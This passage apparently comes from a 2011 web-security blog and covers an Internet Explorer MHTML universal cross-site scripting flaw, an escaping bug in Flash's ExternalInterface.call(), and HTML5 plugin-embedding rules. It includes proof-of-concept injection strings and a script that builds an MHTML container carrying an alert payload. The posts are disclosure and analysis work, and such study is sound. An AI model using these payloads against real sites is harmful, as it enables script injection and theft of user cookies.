Yes, there are vendors who lag behind the rest when it comes to vulnerability response and proactive security work; and there are some hard problems we still have to solve to make the web a safer environment. But the headlines inspired by Pwn2own (and probably encouraged by the organizers) are very unfair, and unnecessarily alienate the parties who should be paying attention to their security posture. Investigating real data, and asking some hard-hitting questions, can make more of a difference... and if done right, it can be more fun.

March 11, 2011

A note on an MHTML vulnerability

There is an ongoing discussion about a recently disclosed, public vulnerability in Microsoft Internet Explorer, and its significance to web application developers. Several of my colleagues investigated this problem in the past few weeks, and so, I wanted to share our findings.

As some of you may be aware, Microsoft Internet Explorer supports MHTML, a simple container format that uses MIME encapsulation (nominally multipart/related) to combine several documents into a single file. Each container may consist of a number of possibly base64-encoded documents, with their content type determined solely by the inline MIME data.
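For reference, a minimal container in this format can be assembled as follows. The boundary string, file names, and payload are arbitrary placeholders; a real file saved by Internet Explorer carries additional headers:

```python
import base64

# The inner document; in the attack scenario described below, this is
# the attacker-influenced content.
body = b"<html><script>alert(1)</script></html>"

container = (
    "Content-Type: multipart/related; boundary=----=_SEP\r\n"
    "\r\n"
    "------=_SEP\r\n"
    "Content-Type: text/html\r\n"
    "Content-Transfer-Encoding: base64\r\n"
    "\r\n"
    + base64.b64encode(body).decode("ascii") + "\r\n"
    "------=_SEP--\r\n"
)
# Such a container would then be addressed with the scheme discussed
# below, e.g. mhtml:http://example.com/some_page!target.html
# (hypothetical URL).
```

Note that the content type of the inner document is determined solely by the inline MIME headers - the property that the attack described below depends on.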

Perhaps by virtue of not having cross-browser support, the MHTML format is not commonly used on the web - but it is employed by Internet Explorer itself to save downloaded pages to disk; and embraced by some third-party applications to deliver HTML-based documentation and help files.

To facilitate access to MHTML containers, the browser also supports a special mhtml: URL scheme, followed by a fully-qualified URL from which the document is to be retrieved; a "!" delimiter; and the name of the target resource inside the container. Unfortunately, when MHTML containers are accessed over protocols that provide other, normally authoritative means for specifying document type (e.g. Content-Type in HTTP traffic), this protocol-level information is ignored, and a very lax MIME envelope parser is invoked on the retrieved document, instead. The behavior of this parser is not documented, but it appears that in many cases, adequately sanitized user input appearing on HTML pages, in JSON responses, CSV exports, image metadata, and so forth, is sufficient to trick it into treating the underlying document as valid MHTML. All that is needed to keep this parser happy is the ability to place several alphanumeric and punctuation characters on the target page, in several separate lines.

The payload inside such an unintentionally served "MHTML container" is able to execute JavaScript, and has same-origin DOM access to the originating domain; with some minimal effort, it is also able to access domain-specific cookies. Therefore, this behavior essentially represents a universal cross-site scripting flaw that affects a significant proportion of all sensitive web applications on the Internet.

Based on this 2007 advisory, it appears that a variant of this issue first appeared in 2004, and has been independently re-discovered several times in that timeframe. In 2006, the vendor reportedly acknowledged the behavior as "by design"; but in 2007, partial mitigations against the attack were rolled out as a part of MS07-034 (CVE-2007-2225). Unfortunately, these mitigations did not extend to a slightly modified attack published in the January 2011 post to the full-disclosure@ mailing list.

It appears that the affected sites generally have very little recourse to stop the attack: it is very difficult to block the offending input patterns perfectly, and there may be no reliable way to distinguish between MHTML-related requests and certain other types of navigation (e.g., <embed> loads). A highly experimental server-side workaround devised by Robert Swiecki may involve returning HTTP code 201 Created rather than 200 OK when encountering vulnerable User-Agent strings - as these codes are recognized by most browsers, but seem to confuse the MHTML fetcher itself.

Until the problem is addressed by the vendor through Windows Update, I would urge users to consider installing a FixIt tool released by Microsoft as an interim workaround.

Update: see this announcement for more.

March 06, 2011

The other reason to beware of ExternalInterface.call()

Adobe Flash has a function called ExternalInterface.call(), which implements a JavaScript bridge to the hosting page. It takes two parameters: the first one is the name of the JavaScript function to call. The second one is a string to pass to this function.

It is understood that the first parameter should not be attacker-controlled (of course, mistakes happen :-). It is also understood that there is no inherent harm in putting user input in the second parameter, if the callback function itself is not behaving stupidly; in fact, Adobe documentation gives an example that follows this very pattern:

  ExternalInterface.call("sendToJavaScript", input.text);

Such a call would be translated to an eval(...) statement injected on the embedding page. This statement looks roughly like this:

  try {
    __flash__toXML(sendToJavaScript("value of input.text"));
  } catch (e) { ... }

When writing the supporting code behind this call, the authors remembered to use backslash escaping when outputting the second parameter: hello"world becomes hello\"world. Unfortunately, they overlooked the need to escape any stray backslash characters, too.

So, try to figure out what happens if the value of input.text is set to the following string:

  Hello world!\"+alert(1)); } catch(e) {} //
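The flawed escaping is easy to model. The sketch below reproduces quote-but-not-backslash escaping, and shows how the string above breaks out of the generated statement (function names follow the example above; this is a simulation, not Adobe's actual code):

```python
def flash_escape(s: str) -> str:
    # Models the flawed behavior described above: double quotes get a
    # backslash prepended, but pre-existing backslashes are left alone.
    return s.replace('"', '\\"')

evil = 'Hello world!\\"+alert(1)); } catch(e) {} //'

injected = (
    'try { __flash__toXML(sendToJavaScript("'
    + flash_escape(evil)
    + '")); } catch (e) {}'
)
print(injected)
```

The attacker's trailing backslash absorbs the added escape character, producing `\\"` - a literal backslash followed by an unescaped quote. The string literal therefore ends early, and `+alert(1))` becomes live code, with the `//` commenting out the leftovers.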

I reported this problem to Adobe in March 2010. In March 2011, after following up, I received the following response:

"We have not made any change to this behavior for backwards compatibility reasons."

Caveat emptor :-)

Warning: OBJECT and EMBED are inherently unsafe

Let's say that you maintain an online discussion forum. Assuming that you explicitly specify the type= parameter in your <object> or <embed> markup, what are the security consequences of allowing users to embed third-party Flash movies in their posts when you enforce the appropriate security restrictions on your end (allowScriptAccess, allowNetworking, allowFullScreen all set to none)? Or, to make things simpler, how about permitting a straightforward video file, with type=video/x-ms-wmv?

If you think this is safe, you may want to know that the HTML5 spec has a different view. The specification effectively takes away the ability for any single party to decide how a particular plugin document should be handled by the browser. Under the new algorithm, instead of your funny cat video, you may accidentally end up embedding Java, which has unconditional access to the DOM of the embedding page through DOMService. Whoops, looks like you are owned now.

According to the spec, if your visitor's browser has, say, a Windows Media Player plugin that recognizes the type=video/x-ms-wmv value on your webpage, that plugin will be used regardless of Content-Type. This part is intuitive. Alas, if the plugin is not found, the specification compels the software to look at Content-Type next, giving the hosting party an opportunity to override the intent specified on your end.

To further complicate the picture, in some circumstances, browsers may also ignore both type= and Content-Type values: for example, Internet Explorer and WebKit browsers will play Flash videos served with Content-Type: pants/whatever and loaded with type=certainly/not-flash just because a stray .swf file extension is spotted somewhere in the URL. The file name signal is problematic, as it can usually be tampered with by whoever provides the URL. This strategy brings yet another player into the picture, and each party can sabotage the security assurances sought by the rest.
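The dispatch order described above can be summarized in pseudocode form. This is a deliberately simplified model of the behavior discussed in this post, not a verbatim transcription of the spec or of any browser:

```python
def resolve_handler(type_attr, content_type, url, installed_plugins):
    # Simplified model of <object>/<embed> dispatch as described above:
    # 1. the markup's type= wins if a matching plugin is installed;
    # 2. otherwise the server's Content-Type gets a say;
    # 3. some browsers additionally sniff the file extension in the URL.
    if type_attr in installed_plugins:
        return installed_plugins[type_attr]
    if content_type in installed_plugins:
        return installed_plugins[content_type]
    if url.rsplit("?", 1)[0].endswith(".swf"):
        return installed_plugins.get("application/x-shockwave-flash")
    return None

plugins = {"application/x-shockwave-flash": "Flash"}
# No WMV plugin installed: the embedding page asked for a video, but a
# stray .swf extension hands the content to Flash instead.
handler = resolve_handler("video/x-ms-wmv", "pants/whatever",
                          "http://example.com/cat.swf", plugins)
```

In this model, no single party - the embedding page, the hosting server, or the URL author - can unilaterally guarantee which plugin ends up interpreting the content, which is precisely the problem.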

It would be more reasonable to keep the behavior of <object> and <embed> consistent with that of other type-specific subresource tags (e.g., <applet>, <img>, or <script>), and give control over how the document is rendered to whoever authored the markup. This approach is still not without peril, because it makes it impossible for some sites to indicate that a particular text/plain or image/jpeg response is not meant to be interpreted as a malicious applet. But that last problem can be fixed by requiring Content-Type and type= to match, perhaps through an opt-in mechanism controlled with a new HTTP header. And in any case, the currently specified logic does not help with it, either.

In the end, the currently specified behavior seems highly counterintuitive, and undoes all the work that plugin vendors such as Adobe or Microsoft put into adding security controls to ensure that their plugin content is reasonably safe to embed across domains that do not fully trust each other.

Test cases here. Joshua Stein also reports that they confuse Flash-blocking tools.